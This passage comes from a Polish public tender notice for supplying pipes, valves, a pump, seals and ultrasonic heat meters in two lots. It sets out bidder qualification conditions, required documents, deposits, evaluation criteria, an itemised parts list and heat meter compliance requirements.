Na potwierdzenie niniejszego warunku należy złożyć wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 
Zamawiający uzna warunek za spełniony jeżeli wykonawca wykonał w tym okresie; 
dla 1 części przynajmniej jednej dostawy armatury , w okresie ostatnich trzech lat, na minimum 15 000,00 zł brutto

dla 2 części przynajmniej jednej dostawy liczników ciepła, w okresie ostatnich trzech lat, na minimum 20 000,00 zł brutto
Tym samym doświadczeniem (dostawami) nie można posłużyć się do obydwu zadań.
Do każdej pozycji wykazu należy załączyć dowody określające, czy dostawy te zostały wykonane w sposób należyty, w szczególności informacji o tym czy dostawy zostały wykonane zgodnie z przepisami prawa i prawidłowo ukończone.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy, wykonawca złoży oświadczenie o braku podstaw wykluczenia oraz przedłoży na potwierdzenie następujące dokumenty:
a)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy;
9.4.5	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej w pkt. 9.4.4, składa odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,

b)	Dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

c)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub w
kraju, w którym miejsce zamieszkania mają osoby, których dotyczą dokumenty, wskazane nie wydaje się dokumentów, o których mowa w pkt. a) i b), zastępuje się je dokumentem zawierającym oświadczenie, odpowiednio wykonawcy, ze wskazaniem osób uprawnionych do jego reprezentacji, lub oświadczeniem tych osób, złożonym przed notariuszem lub przed właściwym - ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tych osób - organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego. Przepis pkt c) stosuje się odpowiednio.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Na potwierdzenie należy złożyć oświadczenie zgodnie  z założeniami w pkt. 9.3. SIWZ-Zamawijący nie stawia w tym zakresie żadnych wymagań.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Na potwierdzenie niniejszego warunku należy złożyć wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 
Zamawiający uzna warunek za spełniony jeżeli wykonawca wykonał w tym okresie; 
dla 1 części przynajmniej jednej dostawy armatury , w okresie ostatnich trzech lat, na minimum 15 000,00 zł brutto

dla 2 części przynajmniej jednej dostawy liczników ciepła, w okresie ostatnich trzech lat, na minimum 20 000,00 zł brutto
Tym samym doświadczeniem (dostawami) nie można posłużyć się do obydwu zadań.
Do każdej pozycji wykazu należy załączyć dowody określające, czy dostawy te zostały wykonane w sposób należyty, w szczególności informacji o tym czy dostawy zostały wykonane zgodnie z przepisami prawa i prawidłowo ukończone.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej której udostępniono SIWZ informacji  o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.  </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Dla części 1  600,00 zł  (sześćset złotych),
Dla części 2  1 200,00 zł (tysiąc dwieście złotych ),
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/03/2017, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa armatury, rur, pompy, kształtek, uszczelnień<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	I Część "Dostawa armatury, rur, pompy, kształtek, uszczelnień"		
L.P.	Nazwa	J.M.	Ilość
1	Płyta uszczelkarska/szczeliwo, typu kryngielit    4 mm   max temp.  150°C, ciśn. 1,6	m2	6
2	Płyta uszczelkarska/szczeliwo, typu kryngielit    3 mm,   max temp.  150°C . C, ciśn 1,6	m2	8
3	Sznur teflonowy do pomp  6x 6, max temp. 150°C                   	kg	0,5
4	Uszczelka kanalizacyjna fi 110   	sztuki	4
5	Kurek manometryczny G1/2 P 1,6 Mpa, mosiądz temp. 150°C	szt.	1
6	Guma  20, zbrojona                                      	m2	2
7	Rura czarna stalowa bez szwu dł: 2200 mm DN 80  wymiary zewnętrzne: 88,9x5,0 mm	szt.	10
8	Rura czarna stalowa bez szwu Dn125   Średnica zewnętrzna 135mm, grubość ścinaki 4,5 mm	m	6
9	Sznur do uszczelnienia drzwiczek kotłów 3,5 cmx3cm  glinokrzemianu (ceramiczne) zbrojone inconelem	m	40
10	Sznur do uszczelnienia drzwiczek kotłów 2,5cmx2cm wykonany z glinokrzemianu (ceramiczne) zbrojone inconelem	m	20
11	Elastyczna rura aluminiowa typu  Spiro Dn200, 1 szt-przewód ściśnięty do 1m, rozciągający się do 3 m.	szt.	6
12	Rura stalowa czarna bez swu Dn 150  wymiary zewnętrzne: 159,0x4,0 mm	m	3
13	Rura czarna stalowa be szwu Dn 32 wymiary zewnetrzne: 42,4x3,2 mm	m	2
14	Rura stalowa czarna bez szwu Dn 15 wymiary zewnetrzne: 21,3x2,9 mm	m	15
15	Kolano stalowe czarne hamburskie do spawania Dn 15 , do 100°C	szt.	6
16	Wkład filtra siatkowego  Dn 125 	szt.	1
	Wymiar wkładu: 139x269 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
17	Wkład filtra siatkowego  Dn 100 	szt.	4
	Wymiar wkładu: 118x212 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
18	Wkład filtra siatkowego Dn 80 	szt.	4
	Wymiar wkładu: 97x183 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
19	Wkład filtra siatkowego  Dn 65 	szt.	4
	Wymiar wkładu: 76x154 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
20	Wkład filtra siatkowego firmy: Polna Dn 50 	szt.	4
	Wymiar wkładu: 61x119 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
21	Otulina rur z pianki poliuretanowej -  Kolana 90 stopni (hamburskie),temperatura do 140 stopni, przewodnośc cieplna 0,03, grubość otuliny:45mm, średnica wewnętrzna otuliny:163 mm	szt.	2
22	Otulina rur z pianki poliuretanowej prosta na rurę, temperatura do 140 stopni, przewodnośc cieplna 0,03, grubość otuliny:45mm, średnica wewnętrzna otuliny:163 mm	m	3
23	Filtr do wody z płukaniem wstecznym DN50. opis parametów filtra w załączniku nr 1	szt.	2
24	"Zawór kulowy gwintowany wewnętrznie dn 50  PN16- Ciśnienie: 16 bar
- temperatura pracy: -20 do +120 stopni
-Uchwyt: dźwignia stalowa, nakładka na uchwyt: LDPE
- Powierzchnia: śrutowana niklowana
-  Przyłączenie: nakrętno-nakrętne
- Przelot: pełnoprzepływowy
- Element sterujący: kula chromowana
- Materiał: mosiądz
- uszczelnienie: PTFE
"	szt.	4
25	"Przepustnica miedzykołnierzowa z dżwignią ręczną dn 50 PN16.dysk: żeliwo sferoidalne GGG40 powlekane poliamidem,
- wykładzina: EPDM lub NBR (Nitryl), - korpus: żeliwo szare GG25 epoksydowane,
- przyłącza: międzykołnierzowe, max. temp pracy 100°C - napęd: dźwignia ręczna opis w załączniku nr 2"	szt.	2
26	 Kołnierz stalowy z szyjka do spawania dn 50 PN16 	szt.	2
27	"Przepustnica miedzykołnierzowa z dżwignią ręczną dn 125 PN16.dysk: żeliwo sferoidalne GGG40 powlekane poliamidem,
- wykładzina: EPDM lub NBR (Nitryl), - korpus: żeliwo szare GG25 epoksydowane,
- przyłącza: międzykołnierzowe, max. temp pracy 100°C, - napęd: dźwignia ręczna opis w załączniku nr 2"	szt.	4
28	Kołnierz stalowy z szyjka do spawania dn 125 PN16 	szt.	8
29	"Przepustnica miedzykołnierzowa z dżwignią ręczną dn 80 PN16.dysk: żeliwo sferoidalne GGG40 powlekane poliamidem,
- wykładzina: EPDM lub NBR (Nitryl), - korpus: żeliwo szare GG25 epoksydowane,
- przyłącza: międzykołnierzowe, max. temp pracy 100°C - napęd: dźwignia ręczna opis w załączniku nr 2"	szt.	1
30	Kołnierz stalowy z szyjka do spawania dn 80 PN16 	szt.	2
31	Manometr tarczowy cieczowy, zakres pomiaru 0-6 bar, rozmiar nominalny 100mm, przyłącze radialne (dolne) klasa dokładności 1.6; max. Temp. medium 90°C.Przyłącze procesowe G1/2.	szt.	2
32	Folia aluminiowa do izolacji wełny mineralnej (grubość 0,20mm) max temp. Stosowania 100°C	m2	17,5
33	Siatka do filtrów siatkowych do odmulaczy, ocynk , oczko 1x1mm	m2	2
34	Siatka  do filtrów siatkowych do odmulaczy, ocynk ,oczko 1x0,5mm	m2	1
35	Odpowietrzniki z zaworem stopowym do instalacji c.o., dn 15,  maksymalna temperatura:  110°C,  max. Cis 1,0MPa	szt.	10
36	Regulator cyfrowy instalacji grzewczych i ciepłowniczych kompatybilny z zaworami reulacyjnymi wyposażonymi w siłowniki elektryczne z serii  5857 Samson,regulator musi być kompatybilny z systemem telemetrii Samosn Administrar . Regulator musi zapewniać sterowanie obiegiem c.o i c.w.u., możliwość regulacji większej ilości obiegów regulacyjnych poprez podłączenie dalszych regulatorów, regulator musi być wyposażony w  podświetlany wyświelacz, np. regulator typu Trovis 5576. 	szt.	1
37	Membranowy zawór bezpieczeństwa,   DN 32/40,  zakres temp. do 140°C, ciśn. do 4,5 Bar, ac=0,32 np. typu 1915	szt.	1
38	Pasta do uszczelniania gwintów (460G)	szt.	2
39	"Taśma teflonowa,  Grubość: 0,10 mm
Szerokość: 12 mm
Długość: 12 mb"	szt.	2
40	Środek w sprayu o działaniu smarującym i wypierającym wodę  Preparat w aerozolu, 400 ml 	szt.	2
41	Olej silikonowy w sprayu lub tubce do smarowania trzpieni zaworów (300 ml)	szt.	1
42	"Pompa samozasysająca o mocy silnika 1,5 kW, spełniająca funkcje stabilizacji ciśnienia w układzie ciepłowniczym z łożyskiem kulkowym po stronie ssącej i tłocznej, typowielkość pompy -4 , ilość stopni pompy-3, wykonanie materiałowe - 3  człony -żeliwo szare , wirniki- brąz cynowy, wał- stal nierdzewna. Pompa wg załączonego rysunku,  z uszczelnieniem sznurowym do cieczy, o temperaturze od -30°C do +70°C. Kompletność dostawy - z silnikiem i ze sprzęgłem i płytą fundamentową.   np. pompa typu SKA 3.02.1.10.10.   
Q  =1-3 m3/h
Hp =64-17 m H2O  
n = 1400 obr/min. Załącznik  nr 3
"	szt.	1
43	"Zawór regulacyjny np. typu 4, DN 20; korpus z żeliwa szarego EN-JL1040 / A 126B;
PN 16; Kołnierze z listwą uszczelniającą, forma B DIN
Zawór regulacyjny np. typu 4 , EN 1092-2; gniazdo ze stali 1.4104; grzyb ze stali
1.4112; dop. temperatura 220°C / 430 °F; mieszek
odciążający ze stali CrNiMo; współczynnik Kvs 6,3 /
współczynnik Cv 7,5; maks. dop. różnica ciśnień 25
bar / jeżeli PN jest mniejsze, to maks. PN
"	szt.	1
44	"Termostat np. typu 2231, wielkość 150; zakres wartości zadanej 20...120°C;
czujnik PN 40 / Class 150; złączka dwustronna G 1;
głębokość zanurzenia 290 mm; czujnik z brązu,
niklowany; rurka łącząca z miedzi, niklowana; długość
3m"	szt.	1
45	Regulator ciśnienia bezpośredniego działania np. typu 41-23 wraz z kompletnym wyposażeniem	szt.	1
46	"Zawór zamykający np. typu 2112 Dn20 , Pn 16 , DN 20; korpus z żeliwa szarego EN-JL1040 / A 126B;
PN 16; kołnierze z listwą uszczelniającą, forma B, DIN
EN 1092-2; gniazdo ze stali 1.4104; krawędź
uszczelniająca grzyba metalowa utwardzana; grzyb ze
stali 1.4112; zakres sprężyny 4400 N; mieszek
odciążający ze stali CrNiMo; dop. różnica ciśnień 25
bar / jeżeli PN jest mniejsze, to maks. PN;
współczynnik Kvs 6,3 / współczynnik Cv 7,5"	szt.	1
47	"Siłownik do zaworu j.w.np. typu 2413 zakres 0,05 -0.25 bar, DN 15...100 / 1/2""...4""; zakres wartości zadanej 0,05
... 0,25 bar / 0,75 ... 3,5 psi; powierzchnia membrany
640 cm / 100 sq. in; membrana z EPDM"	szt.	1
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42310000-9, 42124290-3,
                    44160000-9,
                    44425200-7,
                    42122430-3,
                    38425100-1,
                    42131130-6,
                    38412000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarncja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa liczników ciepła<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
II Część 
Dostawa liczników ciepła.

1.	Zgodność elementów do ciepłomierzy z:
-  Normą PN-EN 1434;
     - Ustawą z dnia 11 maja 2001r. Prawo o miarach (jednolity tekst Dz. U.  
        z 2016r. poz. 884,1948.);
- Ustawą z dnia 15 grudnia 2006r. o zmianie ustawy o systemie oceny zgodności oraz o zmianie niektórych innych ustaw (Dz. U. z 2006r. Nr 249, poz. 1834);
- Rozporządzeniem Ministra Gospodarki z dnia 21 grudnia 2007r. w sprawie wymagań, którym powinny odpowiadać ciepłomierze i ich podzespoły, oraz szczegółowego zakresu sprawdzeń wykonywanych podczas prawnej kontroli metrologicznej tych przyrządów pomiarowych (Dz. U. z 2008r. Nr 2 poz. 2);
- Rozporządzeniem Ministra Gospodarki z dnia 27 grudnia 2007r. w sprawie rodzajów przyrządów pomiarowych podlegających prawnej kontroli metrologicznej oraz zakresu tej kontroli (Dz. U. z 2008r. Nr 3, poz. 13);
- Rozporządzeniem Ministra Gospodarki z dnia 7 stycznia 2008r. w sprawie  prawnej kontroli metrologicznej przyrządów pomiarowych (Dz. U. z 2008r. Nr 5, poz.29);

2.	Oferowane ciepłomierze ultradźwiękowe muszą być przyrządami nowymi fabrycznie i będącymi rozdzielnymi zestawami elementów składowych: przelicznika, przetwornika przepływu i pary czujników. 
3.	Ciepłomierze oraz podzespoły do  ciepłomierzy (przelicznik wskazujący, przetwornik przepływu, para czujników temperatury) muszą być wprowadzone do obrotu lub użytkowania po dokonaniu oceny zgodności z zasadniczymi wymaganiami na podstawie ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (jednolity tekst Dz. U. z 2004 r. Nr 204, poz. 2087) oraz ustawy z dnia 15 grudnia 2006 r. o zmianie ustawy o systemie oceny zgodności .  Wszystkie z wyżej wymienionych części składowych muszą posiadać wydane przez uprawnioną jednostkę notyfikowaną oddzielne certyfikaty badania typu.
